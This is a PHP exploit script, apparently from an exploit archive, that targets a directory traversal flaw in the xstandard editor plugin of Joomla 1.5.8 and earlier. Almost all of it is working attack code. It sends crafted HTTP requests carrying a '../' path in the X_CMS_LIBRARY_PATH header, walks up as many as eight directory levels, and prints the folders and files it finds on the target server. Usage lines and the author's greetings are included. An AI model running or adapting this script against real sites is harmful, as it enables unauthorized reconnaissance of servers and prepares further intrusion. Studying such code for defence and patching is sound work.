<?php /* Joomla <= 1.5.8 (xstandard editor) Local Directory Traversal Vulnerability discovered by: irk4z[at]yahoo.pl greets: all friends ;) */ echo "* Joomla <= 1.5.8 (xstandard editor) Local Directory Traversal Vuln\n"; echo "* discovered by: irk4z[at]yahoo.pl\n"; echo "*\n"; echo "* greets: all friends ;) enjoy!\n"; echo "*------------------------------------------------------------------*\n"; $host = $argv[1]; $path = $argv[2]; $folder = $argv[3]; if (empty($host) || empty($path)) { echo "usage: php {$argv[0]} <host> <path> [<folder>]\n"; echo " php {$argv[0]} example.org /joomla\n"; echo " php {$argv[0]} example.org /joomla ../../\n"; exit; } echo "http://" . $host . $path . "/images/stories/\n\n"; if ( empty($folder) ){ $lev = "./"; for( $i = 0; $i <= 7; $i++ ) { echo browseFolder($host, $path, $lev); $lev .= "../"; } } else { echo browseFolder($host, $path, $folder); } function browseFolder($host, $path, $folder){ $packet = "GET {$path}/plugins/editors/xstandard/attachmentlibrary.php HTTP/1.1\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "X_CMS_LIBRARY_PATH: {$folder}\r\n"; $packet .= "Connection: Close\r\n\r\n"; $o = @fsockopen($host, 80); if(!$o){ echo "\n[x] No response...\n"; die; } fputs($o, $packet); while (!feof($o)) $data .= fread($o, 1024); fclose($o); $_404 = strstr( $data, "HTTP/1.1 404 Not Found" ); if ( !empty($_404) ){ echo "\n[x] 404 Not Found... Maybe wrong path? \n"; die; } //folders preg_match_all("/<baseURL>([^<]+)<\/baseURL>/", $data, $matches); //files preg_match_all("/<value>([^<]+\.[^<]{3,4})<\/value>/", $data, $matches2); $matches = array_merge( $matches[1], $matches2[1] ); if ( empty($matches) ){ $ret = "$folder [x] Failed...\n"; } else { $ret = ''; foreach( $matches as $tmp){ $ret .= str_replace("images/stories/", '', str_replace("/./", "/", str_replace("//", "/", urldecode($tmp) ) ) ) . "\n"; } } return ($ret); } ?>